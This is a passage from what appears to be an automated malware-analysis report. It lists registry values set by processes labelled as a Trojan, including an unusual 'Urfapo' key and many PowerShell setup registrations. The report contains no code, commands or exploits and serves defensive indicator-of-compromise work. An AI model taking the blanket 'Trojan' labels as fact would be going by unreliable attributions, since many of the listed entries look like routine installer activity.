"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process hostname.exe:1384 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 52 A1 8D 57 C9 75 E6 5A AC D0 4F 66 72 46 D0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process PSCustomSetupUtil.exe:620 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 54 75 06 9D 4B F8 1F FE FB 0D 45 C8 74 36 7F"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "B6 37 BB C1 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "198"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "199"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "177"
"StoreChangeIDFor32BitProcesses" = "198"

The process PSCustomSetupUtil.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE CE 84 8A 4B 4E 79 06 01 42 DA C1 8C 5D 68 45"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "44 C8 29 C1 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "195"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "196"
"StoreChangeIDFor64BitProcesses" = "174"
"StoreChangeIDFor32BitProcesses" = "195"

The process PSCustomSetupUtil.exe:3908 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E 19 B0 A2 BB EB BF E4 A2 79 5E 59 6F C7 3E 6C"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "190"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL" = "D0 21 40 C0 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "191"
"StoreChangeIDFor64BitProcesses" = "169"
"StoreChangeIDFor32BitProcesses" = "190"

The process PSCustomSetupUtil.exe:1924 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B 50 62 BF 48 1D 64 06 81 5A F9 42 E8 ED D5 D0"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "3C 19 FA C0 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "194"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "195"
"StoreChangeIDFor64BitProcesses" = "173"
"StoreChangeIDFor32BitProcesses" = "194"

The process PSCustomSetupUtil.exe:2196 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE 1B 63 31 B1 E9 45 92 EA 34 4B D7 FF 9D 1F 61"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PATHEXT" = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.PSC1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:3064 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 42 49 A1 AC F5 97 AF D8 6C 2A B6 B6 83 FB C7"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL" = "B8 14 B1 BF AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "187"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "188"
"StoreChangeIDFor64BitProcesses" = "166"
"StoreChangeIDFor32BitProcesses" = "187"

The process PSCustomSetupUtil.exe:2308 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 BB 4D 64 5E FF EE F0 D9 2F DD 88 AE 80 9C 44"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35,MSIL" = "24 A1 25 CB AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "205"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "206"
"StoreChangeIDFor64BitProcesses" = "184"
"StoreChangeIDFor32BitProcesses" = "205"

The process PSCustomSetupUtil.exe:2224 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 1C 54 50 3A DC B2 53 F9 5F B5 A7 9F A6 BD 6B"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "206"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35,MSIL" = "D2 ED 52 CB AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "207"
"StoreChangeIDFor64BitProcesses" = "185"
"StoreChangeIDFor32BitProcesses" = "206"

The process PSCustomSetupUtil.exe:3696 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 86 8A C2 BE DF E7 6D AE 37 33 16 73 BA 6A 75"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "188"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "1A 26 E3 BF AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "189"
"StoreChangeIDFor64BitProcesses" = "167"
"StoreChangeIDFor32BitProcesses" = "188"

The process PSCustomSetupUtil.exe:3856 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 88 9F 29 F5 79 12 80 1B 61 63 9A 42 93 37 8E"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "C8 72 10 C0 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "189"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "190"
"StoreChangeIDFor64BitProcesses" = "168"
"StoreChangeIDFor32BitProcesses" = "189"

The process PSCustomSetupUtil.exe:2176 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 94 2B 0E C7 49 55 86 DA 21 BF FC 0C 8B D4 16"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "28 A7 4C C2 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "202"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "203"
"StoreChangeIDFor64BitProcesses" = "181"
"StoreChangeIDFor32BitProcesses" = "202"

The process PSCustomSetupUtil.exe:2244 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 2C 98 28 4B ED 76 73 C8 4C 3F 27 FB 96 4B 5A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:2112 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 6E F0 B4 42 B2 00 1E 28 ED A9 9B A6 A9 43 A9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "199"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "200"
"Microsoft.PowerShell.Commands.Utility.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "FC FA DE C1 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "178"
"StoreChangeIDFor32BitProcesses" = "199"

The process PSCustomSetupUtil.exe:2240 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 D5 BF DE 2B D1 CD 25 FC 14 EA 7A 0B 27 DE 27"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "6E 6A 70 C2 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "203"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "204"
"StoreChangeIDFor64BitProcesses" = "182"
"StoreChangeIDFor32BitProcesses" = "203"

The process PSCustomSetupUtil.exe:3992 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 48 8A 6D DB 3C 3D D7 6F C2 0D E4 82 32 0E 1F"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL" = "2C BB 9A C0 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "193"
"StoreChangeIDFor64BitProcesses" = "171"
"StoreChangeIDFor32BitProcesses" = "192"

The process PSCustomSetupUtil.exe:2288 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 BB 23 01 82 BB 18 A9 52 1E 01 FC 97 50 26 AD"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "38 40 04 CB AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "204"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "205"
"StoreChangeIDFor64BitProcesses" = "183"
"StoreChangeIDFor32BitProcesses" = "204"

The process PSCustomSetupUtil.exe:2344 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A A2 10 4F 26 AA 17 8C C0 05 44 A2 CB 8A 03 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "207"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "18 B1 76 CB AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "208"
"StoreChangeIDFor64BitProcesses" = "186"
"StoreChangeIDFor32BitProcesses" = "207"

The process PSCustomSetupUtil.exe:3952 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 48 CC FF 48 FC 2E 11 1A 63 31 45 63 D8 42 CD"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL" = "24 0C 6B C0 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "191"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "192"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "170"
"StoreChangeIDFor32BitProcesses" = "191"

The process PSCustomSetupUtil.exe:2552 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C A6 0A EC 9E A9 21 A5 CA 48 76 F7 C5 41 F2 7C"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "208"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "209"
"Microsoft.PowerShell.Editor.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "C6 FD A3 CB AB F3 D0 01"
"StoreChangeIDFor64BitProcesses" = "187"
"StoreChangeIDFor32BitProcesses" = "208"

The process PSCustomSetupUtil.exe:1496 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 0E AF DF 7E E4 4F 40 EB 12 10 40 BD DB FF 77"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "42 BE 02 C2 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "200"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "201"
"StoreChangeIDFor64BitProcesses" = "179"
"StoreChangeIDFor32BitProcesses" = "200"

The process PSCustomSetupUtil.exe:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 48 43 BB 4D 22 9F 00 44 91 BB 71 1C 2E E1 3D"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Runtime, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "193"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL" = "DA 07 C8 C0 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "194"
"StoreChangeIDFor64BitProcesses" = "172"
"StoreChangeIDFor32BitProcesses" = "193"

The process PSCustomSetupUtil.exe:1868 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 53 0C 7F 00 97 51 F2 4E 8E ED 67 C5 49 74 A0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "196"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "197"
